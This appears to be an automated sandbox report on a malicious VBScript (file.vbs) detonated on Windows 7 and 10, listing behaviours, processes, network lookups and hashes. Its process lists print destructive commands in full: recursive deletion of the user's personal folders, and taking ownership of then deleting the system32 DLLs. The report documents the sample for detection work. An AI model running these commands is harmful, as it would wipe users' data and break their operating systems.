Analysis Overview
SHA256
6d811ce895dd0383e794cef00804d44104196fb5bd263305fb3f10be77f24711
Threat Level: Likely malicious
The file file.vbs was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Checks computer location settings
Modifies file permissions
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 21:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 21:06
Reported
2024-08-09 21:07
Platform
win7-20240704-en
Max time kernel
44s
Max time network
18s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k rd /s /q C:\Users\Admin\desktop >nul && rd /s /q C:\Users\Admin\downloads >nul && rd /s /q C:\Users\Admin\documents >nul && rd /s /q C:\Users\Admin\pictures >nul && rd /s /q C:\Users\Admin\music >nul && rd /s /q C:\Users\Admin\videos >nul && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\*.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\*.dll /grant Everyone:(F)
C:\Program Files\Windows Sidebar\sidebar.exe
"C:\Program Files\Windows Sidebar\sidebar.exe" /showGadgets
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe"
C:\Windows\system32\magnify.exe
"C:\Windows\system32\magnify.exe"
Network
Files
C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs
| MD5 | f552e24893f6d17cbf9ec48b8dc95bf6 |
| SHA1 | 141081a16db1c097d7d377f1cd3d2e3b0c85e18b |
| SHA256 | 98e5aa2e5b1d25eb95b305bd6ab2f0c7277a563791799bad5a00316acc68fd28 |
| SHA512 | 1008ead20f91fbd84e1a2dd665be008a3aa70b853b38599a308853ac8fd8e15b619e4d16ef4cef54f8c087b8c48a658c82c88d30171d6eb1991049ad8f259063 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-09 21:06
Reported
2024-08-09 21:07
Platform
win10v2004-20240802-en
Max time kernel
52s
Max time network
55s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k rd /s /q C:\Users\Admin\desktop >nul && rd /s /q C:\Users\Admin\downloads >nul && rd /s /q C:\Users\Admin\documents >nul && rd /s /q C:\Users\Admin\pictures >nul && rd /s /q C:\Users\Admin\music >nul && rd /s /q C:\Users\Admin\videos >nul && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\*.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\*.dll /grant Everyone:(F)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=1436 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| N/A | 204.79.197.203:443 | tcp |
Files
C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs
| MD5 | f552e24893f6d17cbf9ec48b8dc95bf6 |
| SHA1 | 141081a16db1c097d7d377f1cd3d2e3b0c85e18b |
| SHA256 | 98e5aa2e5b1d25eb95b305bd6ab2f0c7277a563791799bad5a00316acc68fd28 |
| SHA512 | 1008ead20f91fbd84e1a2dd665be008a3aa70b853b38599a308853ac8fd8e15b619e4d16ef4cef54f8c087b8c48a658c82c88d30171d6eb1991049ad8f259063 |